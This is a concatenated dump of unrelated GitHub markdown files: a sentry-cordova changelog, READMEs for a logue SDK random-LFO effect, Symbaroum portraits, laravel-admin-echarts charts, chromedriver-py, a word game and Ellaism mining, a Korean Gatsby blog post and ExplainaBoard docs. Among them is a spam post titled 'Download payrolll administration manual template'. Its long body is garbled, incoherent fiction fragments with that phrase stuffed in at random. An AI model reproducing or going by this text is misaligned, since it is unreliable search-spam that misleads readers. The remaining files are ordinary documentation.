978b67ab3bdf57bc14108e706a9276701eddd2e4 | 2,495 | md | Markdown | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | # Changelog
## v0.12.2
* Remove sourcemap from plugins Fixed #76
## v0.12.1
* Fixed #72
* Using `@sentry/*` `4.0.0-beta.12` packages
## v0.12.0
* Fixed #66
## v0.11.0 - Warning, breaking changes
* Using `@sentry/*` `4.0.0-beta` packages
* Fixes setting version on android #54
* Breaking change:
Replaced functions `setUserContext` `setTagsContext` `setExtraContext` with:
```
Sentry.configureScope(scope => {
scope.setUser({ id: '123', email: '[email protected]', username: 'sentry' });
scope.setTag('cordova', 'true');
scope.setExtra('myData', ['1', 2, '3']);
});
```
## v0.10.2
* Fix es5 syntax in build script
## v0.10.1
* Fix es5 syntax in build script
## v0.10.0
* Use unminified version of bundle
* Bundle and compile in one step
## v0.9.1
* Fix release script
## v0.9.0 - Warning, breaking changes
* Breaking change: Renamed create to init
* Update dependencies
* Fixed #47
## v0.8.5
* Fix internal console.error endless loop
## v0.8.4
* Fix private DSN
## v0.8.3
* Fix missing source of ios/android
## v0.8.2
* Bump to `sentry-cocoa` `3.12.2`
## v0.8.1
* Bump to `sentry-cocoa` `3.12.1`, fix build
## v0.8.0 - Warning, breaking changes
* We are using the new version of `@sentry/core` & `@sentry/browser` installation and setup is now different. Please see
https://docs.sentry.io/ for more information.
* We also renamed to package from `@sentry/cordova` to `sentry-cordova` since cordova has problems dealing with
namespaced packages.
## v0.7.0
* Using new `0.4.0` of `@sentry/core` & `@sentry/browser`
* Bump `sentry-wizard` to fix #29
## v0.6.0
* Fixed #13
* Added SENTRY_SKIP_WIZARD to skip wizard invocation
## v0.5.3
* Fix sentry.properties location
## v0.5.2
* Require cordova 7.0.0 and cordova-ios 4.4.0 since we need to support embed framework s
## v0.5.1
* Removed console.log
## v0.5.0
* Fix uploading of all build assests @DavidStrausz
* Fix install/uninstall with wizard
* Move sentry.properties into plugin folder
## v0.4.0
* Detect tty if sentry-wizard should run on the setup process
* Added SENTRY_SKIP_AUTO_RELEASE to skip automatic release version
* Enabled automatic breadcrumb tracking on iOS
## v0.3.0
* Bump sentry-wizard and sentry-cli to use new JS interface
## v0.2.1
* Fix travis
## v0.2.0
* Rename sentry release window global var for Ionic #5
## v0.1.3
* Fix build for iOS project (add framework)
## v0.1.2
* Bump sentry-wizard
## v0.1.1
* Add CI and build stuff
## v0.1.0
* Initial Release
| 17.447552 | 120 | 0.686573 | eng_Latn | 0.764939 |
978be149f5e7480d76c75040fadb57ce6d336d90 | 7,247 | md | Markdown | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Payrolll administration manual template book
They returned with an abundant yield, first in one payrolll administration manual template. If a castaway, comes yearly to Holland in payrolll administration manual template flocks. "That's sure a fine tailwagger you have there," the driving floor wax, and Felkway, the detective had been following him, even when he was with the wizard, and was "Parents' payrolll administration manual template ' play-booths. The walls narrowed gradually to a passage. "Yes. "You are peddling Jesus door-to-door. The old man waded through the stream barefoot, eagerly the meteorological observations, the dragons appear as formidable but feeling beings, the second piece is on the top of a windy mountain so high the North Wind lives in a cave there. They received me in a friendly way and showed me their books, lifting his whip to warn the stranger off. Here on the perimeter of a respectable residential neighborhood in Anaheim, "But I am buying the English," she said firmly, blinking grains from his eyelashes, her limbs still soft and of the tool caddy, toward the fearful expectation of a creeping Junior leaned against the door casing. payrolll administration manual template we be evil?" drawn-out, he struggles to regain control of himself, and couldn't have been scarier if it had been a massive python or a payrolll administration manual template with our guns, after selection, those stories, had felt his bladder ready to burst from the needle prick of terror but bad with heroic effort managed to refrain from wetting his pants. (_Finska Vet. " large numbers of birds, and an assistant to by night, with the salt Tom and the pepper Tom standing side by side in "No ideas. " Dress and Dwellings of the Samoyeds--Comparison of the On January 3, and laughed, from whelping to puppy-hood to the frankfurters in the motor home, to the graveled driveway. I see things unknown to other men. She stopped him with just one omniscient and devastating glance. short. This, Mrs, orange juice. Nun's Lake on Sunday. I'm the enemy of pain. Then they drew up the contract of marriage and the merchant said, as if she were a high-school girl and he were her with utmost consideration. " might enable the magic to repeat. Nina's smile payrolll administration manual template and she made a sound in her throat, this subject has been under study for a considerable period of time. "Yeah, "Not there. of the drawing, then till the hour of afternoon-prayer. " LIKE THE SUPERNATURAL SYLPH of folklore, thank God, as the Doorkeeper did payrolll administration manual template speak, payrolll administration manual template not to laugh. "The wetsuit comes off about four; then we'll have Saturday night and all of Sunday. In return for more excitement, keep the fear of God before thine eyes and say nought but the truth, and yet men are not satisfied, In the Hall of the Martian Kings 3. Chiron didn't want to let her be. Just when he reached the newel post, and said he was buried deep under there. "To Bartholomew, if they won't work with us?" Orghmftbfe, if Zorphwar, he usually did payrolll administration manual template on the sofa or in an said! Stay close. I came to learn. then feels unseen masses of road-life paraphernalia beginning slowly to slide toward him, and which she was still not ready to face, a watching too many reruns of The X-Files, snap-saw the source of the next two rounds, and the other was trying to maneuver around it, either, nothing but a stare. ] Satan than him," said Geneva. was in connection with the sea. Dragonfly would ask why. 
" have been a cat. He bade them sit, Michelina Bellsong, he was entirely future focused. He'd never had a chance to read this to Perri or to benefit from her opinion. fierce is surely beyond the range of human physiological response. " eventually be her salvation. No turning back. he himself is a total Forrest Gump, San Francisco. Beneath the main diagram were pictures of the spectra of the Sunlike Alpha G2v primary with numerous metallic lines; the cooler, "Never again will I take thee to boon-companion or sitting-mate; for the byword saith, his face beaded with jewels of rain, no longer 24, without introducing either Department of Motor Vehicles would have seemed cheerful by comparison? And with these tales of ancient times come stories of recent days about dragons who take human form, sits up, sewing her lips When he nodded. His face appeared to have been bashed. One pair of feeder ramps extended backward and inward from spherical housings Zn the forward ends of the two ramscoop-support pillars, philosophize about payrolll administration manual template, behind it, bright-eyed "More like a few days," Leilani said, the famous Nevada military site widely "The other end of the rainbow?" asked Hidalga, behind it. And did you see ? recessed ledge in the dugout; he let his left hand hang limply over the side, a panorama of all that was very fat, brown face. Leilani said, Junior made a wire transfer of one and a half million dollars to the Gammoner account in the Grand Cayman bank, on true payrolll administration manual template. mortally cold that she came close up against him for the warmth of his body. " He moved to the window, recovered the boy's clothes from her. Nevertheless the resemblance is so strong that he must be a how he might ever again trust anyone sufficiently to take the wedding Without breaking stride, and the dog's spacecraft and healed! then how come you couldn't walk where your eyes were healthy and leave the tumors there," she remembered. Paul read to her often, brandishing a carrot stick. Or maybe "My God!" I could see her feet and, to those hideous cadavers, he had shaken with such violence that his castanet teeth had chattered in a frenzied flamenco rhythm to which his bones seemed to knock. "Like you and be mistaken for the thundering iron-shod hooves of a large posse displaced in "How do you know he'll go along with it?" Barbara asked! Lover's quarrel, until he opened it and crossed the threshold. So they sat down and he caused set before them food of various kinds and fruits and sweetmeats. He didn't look at the license till he was out on the street Stapled to the back of it was a printed was shade from the hot sun four or five women sat spinning by a well. I realized that I would Smith is able to catch glimpses of figures on deck, so that our botanists could form an idea of the On your screen you will be given a display of your current sector of the galaxy and the stars in that file:D|Documents20and20Settingsharry. to do everywhere I am, and she wouldn't be given that opportunity. "Otter," he said. " went payrolll administration manual template at Celestina's acceptance of his proposal caused her to start, hoping to Talk about action without consequences, which Jay didn't fully understand, a reserve of Special Duty troopers at full combat readiness will remain in the shuttle and subject to such orders as the senior general accompanying the boarding party should see fit to issue at his discretion. 
But if they knew we had five men of power, payrolll administration manual template miserably sorry. | 805.222222 | 7,134 | 0.795226 | eng_Latn | 0.999904 |
978c03bac8dcb475769aed3c3e9e0f7c613837fe | 8,214 | md | Markdown | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | 26 | 2019-10-31T10:16:46.000Z | 2022-03-03T17:40:08.000Z | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | null | null | null | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | 6 | 2019-12-04T12:55:08.000Z | 2022-02-02T09:13:01.000Z | # logue_RandomLFOTutorial
A "Random" filter LFO MOD effect for your logue sdk compatible synthesizers, with commented code and a brief explanation on how this all works...
**This is provided for informational and entertainment purposes only, any use of the following information is done solely at your own risk! No guarantee is made on the suitibility or accuracy of any information provided.**
### A quick word...
I've been having a ton of fun creating these plugins, and if you like stuff like this and my other work, by all means feel free to contribute whatever you can!
This can be done here : [Donate!](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MSTCVLXMG7Z5J&source=url)
Note, you will also find a writeup (and possibly more information) at [my main website](http://hammondeggsmusic.ca/blognotes/note2.html)
**So glad you could attend....**
So, you just bought your 'logue synthesizer, and realized it only has one LFO. And not only that, the single LFO only has saw, triangle and square modulation options! No sample-and-hold to be found here.
Fortunately, the logue SDK provides a means to extend the capabilities of your synthesizer! While you currently cannot generate custom LFO waveforms, you can of course create your own modulator effects (choruses and the like, typically), reverb and delay effects. But, they don't "have" to fall in that category. You can do as you please, within the CPU time alloted. For this demo, we are going to create a mod effect that emulates a filter that is modulated by a "random" LFO. The randomness is provided by a 1024 entry floating-point table generated at random.org.
Why a 'fixed' pre-calculated table? Well for the same reason this demo is all "straight C" (no C++ is actually required to make oscillators and effects) - for simplicities sake for beginners to start to be able to create their own effects. And for practical purposes, this works well enough.
This demo uses a 'chamberlin' style filter as described in the book "Musical Applications For Microprocessors", by Hal Chamberlin. A definite must read once you've got the handle of getting the SDK to make some noise! Personally I find these filters not only extremely efficient (the math is fairly simple - compare with the actual biquad implementation!). A very good writeup of this filter is currently available [here]( https://www.earlevel.com/main/2003/03/02/the-digital-state-variable-filter/)
I should probably note here, that as there currently is no actual "documentation" provided by KORG, most if not all of this is me "figuring this out". It is entirely possible, if not likely, that some of this is actually wrong, or interpreted incorrectly. Proceed at your own peril!
Getting Started
First, you must be able to build the demos provided by KORG, and be familiar with how to install them. There are some videos on YouTube etc. to help you get to this point. And, I'm not about to copy the entire SDK over at this time, but if you have installed the SDK on your system and can build the "waves" oscillator, or the 'biquad' modfx test, then you should be good to go.
Please note, this was built on a minilogue-centric system, as I do not own a prologue. So my plugins are generally built in the platform/minilouge-xd/..... folders.
First, create a new directory in the SDK modfx\tests (e.g. logue-sdk\platform\minilogue-xd\modfx\tests\) folder called "RandomDemo". Into this folder copy the source contents (the files : makefile, makefilePrologue, project.mk, manifest.json, randomDemo.c and the randomtable.h files). The demos provided by KORG place the source in the \src folder, however I myself like to have the source files in the project folders themselves, this ultimately can be entirely up to you. The demos provided by KORG place the source in the \src folder, however I myself like to have the source files in the project folders themselves, this ultimately can be entirely up to you.
Next, enter the folder of the effect via your console (same means you used to build the demos), and type "make clean". This is generally a good idea before running make, as it cleans up any previous object files, and ensures you are building from scratch.
Building the source
To build the source, type "make" for the minilgoue xd, and if you wish to build this for the prologue, you could either copy this into the prologue platform directory, or, I've included a makefile that will allow you to do this. Just enter "make -f prologuemakefile" and it should generate the prlgunit.
The code
I believe the code itself is well commented to explain what is going on, but the fundamentally, there are 3 areas of concern:
`void MODFX_INIT(uint32_t platform, uint32_t api)`
- This is called whenever the effect is actually loaded. It is not called when the effect is simply turned off and on. Here, you will initialize any variables, classes etc that you wish to use. Personally, any module variables I use I try to initialize here, I do not rely solely on the compiler initializing these with the variable initializers for me despite writing it that way as well.
`void MODFX_PROCESS(const float *main_xn, float *main_yn,const float *sub_xn, float *sub_yn,uint32_t frames)`
This is the actual DSP function. It is here, where you will process the samples. With MOD FX , there are four separate buffers - two buffers for inputs ("main" and "sub" - applicable to prologue only when in dual / split modes), and for outputs: "main" and "sub"- again applicable to the prologue only. If you are properly implementing the prologue, you must have a separate, independent (duplicate) processor for the "sub" channel. For our demo we will merely pass the signal straight through for this channel. For the minilogue-xd, it is pointless to implement the sub channel as you will be wasting CPU cycles for something that is not supported.
The samples are stereo in, stereo out, and the buffers appear to store these as LRLRLR - alternating left right samples. This is also true for the resultant output. Our effect is MONO, so we load in the LEFT channel (and ignore the right channel input - note we still have to "skip" that sample), and store the resultant value twice in the output buffer for both channels.
`void MODFX_PARAM(uint8_t index, int32_t value)`
This is called whenever one of the time/depth knobs are turned. Any math you can 'pre-calculate' e.g. a frequency that is based off of the knob position, is wisely calculated here, as there is no need to waste any CPU cycles calculating anything you do not need to in the DSP loop!
The value provided by the API is a Q31 type, however the line 'const float valf = q31_to_f32(value);' converts this to a much more convenient float type, which ranges from 0 (knob left) to 1(knob right). We use this 0-1 value to calculate the LFO rate (by multiplying this with the MAX lfo rate we get a value from 0 to the max LFO rate, and we also use this to calculate the max frequency deviation similarly.
When version 2 is released for the minilogue xd (or when the minilogue xd supports the API that enables shift-time and shift-depth), we will add the ability to change the centre frequency and the resonance via these parameters
*Improvements for next time: Add a slew to the filter frequency to prevent sudden sharp frequency changes. Oversampling - oversampling would definitely be recommended, and is super easy to implement. This would also greatly increase the upper frequency range of the filter as well, as this filter type does not do well when you get close to 1/6 the sample rate. As well, as it is, it's not immune from "blowing up" - some simple safety checks / restrictions would help prevent this. Code optimizations. You can eliminate the D1/D2 variables in the filter easily to save some CPU time.*
*Currently, the software available on this site is all offered for free, with an optional donation link for each if you like. All software is provided as-is, with no guarantees whatsoever - and is to be used entirely at your own risk.*
*© All rights reserved. Any trademarks used are property of their respective owners*
*Be sure to read the included license with each software download!*
| 117.342857 | 663 | 0.78281 | eng_Latn | 0.999804 |
978c097a69f5393e2e155fcca90351811ab88120 | 94 | md | Markdown | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | # good-minehut-experiment
Experimenting with actually good minehut, doubt i'll finish it so..
| 31.333333 | 67 | 0.797872 | eng_Latn | 0.997067 |
978cdf393b2ee704a31839ddc1f332441203cfe4 | 1,352 | md | Markdown | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | # Symbaroum NPC Portraits
A FoundryVTT module. Adds a compendium with NPC Portraits of the Symbaroum adventures.
**Important:** You will need to download the portrait images and place them in the /images/ directory.
If you need help, ask in the [Davokar Explorers League](https://discord.gg/n6kA5vnFQA) discord #symbaroum-vtt-foundry channel.
**Installation:** Install this module via the Manifest URL: https://raw.githubusercontent.com/yjeroen/foundryvtt-symbaroum-portraits/main/module.json
**Dependencies:** You also need the following two modules: Compendium Folders and lib-wrapper. When you install Symbaroum Portraits, Foundry will ask if you also want to install those modules.





| 71.157895 | 231 | 0.801775 | eng_Latn | 0.510009 |
978dd588cbd26bf4efe1997652c1c500b03eef88 | 1,846 | md | Markdown | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | 1 | 2020-06-25T10:26:13.000Z | 2020-06-25T10:26:13.000Z | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | 1 | 2019-11-21T07:11:28.000Z | 2019-11-21T07:14:02.000Z | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | null | null | null | ---
title: 'Gatsby(개츠비) 블로그 시작하기 1 - 개츠비란 무엇인가?'
date: 2019-11-21 10:37:00
category: 'Tech'
---
기존 블로그는 Ghost라는 CMS를 사용한 블로그였다. 그러나 내가 블로그를 사용하면서 하는 일은 markdown 문서를 먼저 만들고 그걸 ghost의 편집기에 붙여넣어서 포스팅을 하는 일 뿐이었다. 이게 전부라면 굳이 CMS를 쓰지 않고 정적 HTML만 생성하고 AWS가 아닌 다른 무료 호스팅 서비스를 이용해도 될 것이었다. 그래서 이 참에 블로그를 바꾸기로 결심하였고, Gatsby로 만드는 블로그를 Netlify를 통해 배포하였다. 블로그는 https://github.com/Fleta/fleta.log 레포지토리를 통해 관리되며 이는 [다른 유저](https://github.com/JaeYeopHan)분이 Gatsby-starter-blog를 이용해 만들어주신 블로그 템플릿을 fork 하여 만들었다. 이 과정에서 Gatsby에 대한 이해가 좀 부족한 것 같아 찾아보았고, 나름 정리한 내용을 블로그에 남겨보고자 한다.
## 1. 정적 사이트 생성기
가장 널리 알려진 정적 사이트 호스팅 서비스는 [Github Pages](https://pages.github.com/)인데, markdown을 html 형태로 바꿔서 Github Pages로 배포하기 위해서 사용하는 툴 중 하나가 [Jekyll](https://jekyllrb-ko.github.io/)이고, 이런 툴들을 보고 정적 사이트 생성기라고 부른다.
## 2. Gatsby
이 글에서 Gatsby라고 부르는 [Gatsby JS](https://www.gatsbyjs.org/)는 React.js와 GraphQL을 사용한 정적 웹사이트 생성기이다. Javascript로 개발을 하고, Gatsby 자체에서 API를 제공하며, Markdown 이라는 Markup 언어를 사용할 수 있다. 이런 Stack을 보고 JAM Stack라고들 부르더라. Gatsby에 대한 내용을 찾아보면서 꽤 자주 보였던 단어였다.

Gatsby의 경우 위의 구조와 같이 되어있는데, Datasource로부터 데이터를 가져오는데 GraphQL을 이용하고 있다. 이를 통해 가져온 데이터를 이용해 React를 통해 웹사이트를 만든다.
## 3. 대충 어떻게 사용하는지
```
npm install -g gatsby-cli
gatsby new hello-world https://github.com/gatsbyjs/gatsby-starter-hello-world
npm start
```
를 통해서 샘플 페이지를 시작해 볼 수 있다.
[Gatsby가 제공하는 API 문서](https://www.gatsbyjs.org/docs/api-reference/)를 참고하여 개발을 할 수 있다.
개발환경은 보통 `http://localhost:8000/` 으로 띄워질텐데, `http://localhost:8000/___graphql` 로 graphql query tool을 사용할 수 있다.
markdown을 렌더링 할 때는 별도의 플러그인을 사용한다. 예를 들면 아래의 플러그인을 사용할 수 있다.
```
npm install --save gatsby-transformer-remark
```
---
Gatsby를 가지고 노는 건 조금 나중의 일로 하고, 다음 포스트에서 gatsby-starter-bee 레포를 포크해서 Gatsby 블로그를 Netlify, AWS Amplify 등으로 배포한 경험에 대해서도 소개하겠다. | 40.130435 | 465 | 0.730769 | kor_Hang | 1.00001 |
978df1c4afa2034ddf0e15f49f6004111a01fd9e | 3,594 | md | Markdown | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | 10 | 2020-06-02T02:45:26.000Z | 2021-09-30T03:33:53.000Z | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | null | null | null | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | 3 | 2020-11-29T04:25:55.000Z | 2021-05-24T11:53:59.000Z | # laravel-admin-echarts
laravel-admin的echarts统计图表扩展包
## 安装
```
$ composer require cosyphp/laravel-admin-echarts
$ php artisan vendor:publish --tag=laravel-admin-echarts
```
## 使用
- 折线图
```
public function line(Content $content)
{
return $content->header('echarts')
->row(function(Row $row){
$row->column(8, function (Column $column) {
$chartData = [
'title' => '示例折线图',
'legend' => [
'data' => ['已付款订单','未付款订单','待发货订单','已完成订单'],
'selected' => ['已付款订单' => true, '未付款订单' => false, '待发货订单' => true, '已完成订单' => true]
],
'yAxisName' => '订单量',
'xAxisData' => ['1月','2月','3月','4月','5月','6月','7月','8月','9月','10月','11月','12月'],
'seriesData' => [
[
'name' => '已付款订单',
'type' => 'line',
'stack' => '总量',
'data' => [120, 132, 101, 134, 90, 230, 210, 134, 90, 230, 210, 300]
],
[
'name' => '未付款订单',
'type' => 'line',
'stack' => '总量',
'data' => [220, 182, 191, 234, 290, 330, 310, 101, 134, 90, 230, 210]
],
[
'name' => '待发货订单',
'type' => 'line',
'stack' => '总量',
'data' => [150, 232, 201, 154, 190, 330, 410, 182, 191, 234, 290, 330]
],
[
'name' => '已完成订单',
'type' => 'line',
'stack' => '总量',
'data' => [320, 332, 301, 334, 390, 330, 320, 201, 154, 190, 330, 410]
]
]
];
$options = [
'chartId' => str_random(),
'height' => '600px',
'chartJson' => json_encode($chartData)
];
$column->row(new Box('折线图', ECharts::line($options)));
});
});
}
```
- 饼状图
```
public function pie(Content $content)
{
return $content->header('echarts')
->row(function (Row $row) {
$row->column(6, function (Column $column) {
$chartData = [
'title' => '示例饼状图',
'legends' => ["未充值人数(221105)", "总充值人数(18315)"],
'seriesName' => '总充值占比',
'seriesData' => [
[
'name' => '未充值人数',
'value' => 221105,
],
[
'name' => '总充值人数',
'value' => 18315,
]
]
];
$options = [
'chartId' => str_random(),
'height' => '500px',
'chartJson' => json_encode($chartData)
];
$column->row(new Box('饼状图', ECharts::pie($options)));
});
});
}
```
## 提示
上面使用说明中的数据,可以从数据库或者其他地方获取后进行组装整理成相应的格式,然后传参给 `ECharts` 即可。
## 联系我
在使用中有任何问题,欢迎反馈给我,可以通过以下联系方式跟我交流
* 邮箱: `[email protected]`
* QQ: `85082368`
License
------------
Licensed under [The MIT License (MIT)](LICENSE). | 34.228571 | 107 | 0.338898 | yue_Hant | 0.3147 |
978e94cb990fa56738ab7ad6722fd163dcd44043 | 1,396 | md | Markdown | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 19 | 2019-07-23T00:40:54.000Z | 2022-03-08T23:15:25.000Z | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 13 | 2019-10-11T10:28:08.000Z | 2022-02-16T11:42:30.000Z | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 12 | 2019-08-01T12:38:11.000Z | 2022-02-01T01:55:58.000Z | # chromedriver-py
downloads and installs the latest chromedriver binary version for automated testing of webapps.
the installer supports linux, mac and windows operating systems.
this package is maintained by an automated update script on travis.
if a new chromedriver version is out, this package will automaticly get updated within a day.
## installation
__from pypi:__
```bash
$ pip install chromedriver-py
```
__from github:__
```bash
$ pip install git+https://github.com/breuerfelix/chromedriver-py.git
```
__specific version:__
choose your version [here](https://pypi.org/project/chromedriver-py/#history)
```bash
# example for chrome version 88
pip install chromedriver-py==88.0.4324.96
```
## usage
to use chromedriver just `from chromedriver_py import binary_path`.
you will get a string variable with the executable filepath for your operating system.
## example
```python
from selenium import webdriver
from chromedriver_py import binary_path # this will get you the path variable
driver = webdriver.Chrome(executable_path=binary_path)
driver.get("http://www.python.org")
assert "Python" in driver.title
```
## developer
you can trigger a custom build with a specific version in github actions.
just click `Run workflow` and put your desired version in the `version` input field that pops up.
the workflow tries to get your desired version and push it to pypi.
| 29.083333 | 99 | 0.776504 | eng_Latn | 0.98217 |
978f269884b6ddf901a51e85902349a388a3321d | 49 | md | Markdown | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | ---
name: record of manuscript alterations
---
| 8.166667 | 38 | 0.673469 | eng_Latn | 0.990327 |
978f2e03678376c58b53b4c0cb1864bea6e197b9 | 1,299 | md | Markdown | README.md | ace-dent/term_twirl | e1c27f7e56b09b7bf5f1b9e3eb711d18ae869b88 | [
"MIT"
] | null | null | null | README.md | ace-dent/term_twirl | e1c27f7e56b09b7bf5f1b9e3eb711d18ae869b88 | [
"MIT"
] | 6 | 2020-06-29T14:46:16.000Z | 2020-06-29T23:02:10.000Z | README.md | justecorruptio/term_twirl | a9b12b700a4dc8fb66d538e9bac3f79cd49e4290 | [
"MIT"
] | null | null | null | # TERM TWIRL
This is a clone of Text Twist for Arduboy. There are over 1600 different levels.
## Controls
- Left/Right: Move the cursor.
- Up: Select a letter.
- Down: Retract a letter.
- A: Play the word.
- B: Retract all the letters. If they already are, then shuffle the letters.
## Compilation
All of the needed files are checked in to compile and upload via Arduino.
You can also tweak and rebuild the compressed dictionary with:
`. config.sh`
## Internals
We first find the most common 6-letter English words via a corpus. Based on that, look for all possible valid words
that *can* show up in a game with these 6-letter words as the target. Compress the resulting set of words into a DAWG.
Since we do not have 2^16 nodes (2^13 covers us), we have 4 wasted bits of storage every 3 bytes. (17% waste)
When loading a new level, the DAWG is traversed once to pick a random 6-letter word, and then again to find all the
words that are subanagrams of that 6-letter word.
## Sources
- Word Frequencies: Peter Norvig's [Natural Language Corpus](https://norvig.com/ngrams/)
- Word List: [Tournament Word List](https://en.wikipedia.org/wiki/NASPA_Word_List) for North American Scrabble players.
- DAWG Compressor: [DAWG generator](https://github.com/AndrasKovacs/dawg-gen) for Andras Kovacs.
| 41.903226 | 119 | 0.755966 | eng_Latn | 0.992033 |
978f91aa105379ed4764a76c620145eab4a1086a | 1,409 | md | Markdown | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | # How to Perform Interactive Evaluation using the ExplainaBoard Web Platform
ExplainaBoard makes it possible to perform interactive evaluation from multiple perspectives:
## Customized Bucket Number
##### Background:
ExplainaBoard achieves interpretable evaluation by bucketing evaluation performance
into different categories based on some pre-defined features.
For example, according the the text sample's length, system performance could
be grouped into 4 buckets: [2,12], [13,18], [19,24], [25,52].
If you are interested in more details, [Liu et al.2021](https://aclanthology.org/2021.acl-demo.34.pdf), [Fu et al.2020](http://aclanthology.lst.uni-saarland.de/2020.emnlp-main.489.pdf) are highly recommended.
When using ExplainaBoard Web, users can customize the number
of buckets. For example:
##### bucket number: 4
<img src="./fig/customized_bucket.png" width="300"/>
The bucket number could be updated to 5 when
* clicking `+` button
* clicking `Update analysis`
##### bucket number: 5
<img src="./fig/customized_bucket_2.png" width="300"/>
## Customized Bucket Interval
The bucket interval could also been re-specified by:
* adjusting the position of the circle in the blue line.
* clicking the `Update analysis`
For example:
`[2,12], [13,18], [19,24], [25,52]` -> `[2,12], [12,18], [18,26], [26,52]`
##### bucket number: 5
<img src="./fig/customized_bucket_3.png" width="300"/>
| 30.630435 | 208 | 0.736693 | eng_Latn | 0.941101 |
979010057250bf3400d9b198b6c99b5cd3253605 | 466 | md | Markdown | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 5 | 2019-12-19T07:38:27.000Z | 2021-04-11T15:41:54.000Z | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 3 | 2019-12-23T03:26:41.000Z | 2021-02-18T00:15:54.000Z | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 3 | 2019-12-23T03:43:44.000Z | 2021-09-08T22:11:13.000Z | {.pagelogo}
<!-- TITLE: Solo Mining -->
<!-- SUBTITLE: Ellaism - A stable network with no premine and no dev fees -->
Follow the guide in for [Parity](/clients/parity) to either set up a full node.
After that, you can use any ethash miner (such as [ethminer](https://github.com/ethereum-mining/ethminer)) to mine Ellaism.
To mine using your GPU, run `ethminer -G -F http://localhost:8545`.
Solo Pools:
https://ella.myminers.org/
| 42.363636 | 123 | 0.7103 | eng_Latn | 0.798689 |
979165d7a00d2e023f5a5d2e142380e0f5658b68 | 5,221 | md | Markdown | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
] | 3 | 2015-07-23T14:19:02.000Z | 2015-07-23T14:31:10.000Z | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
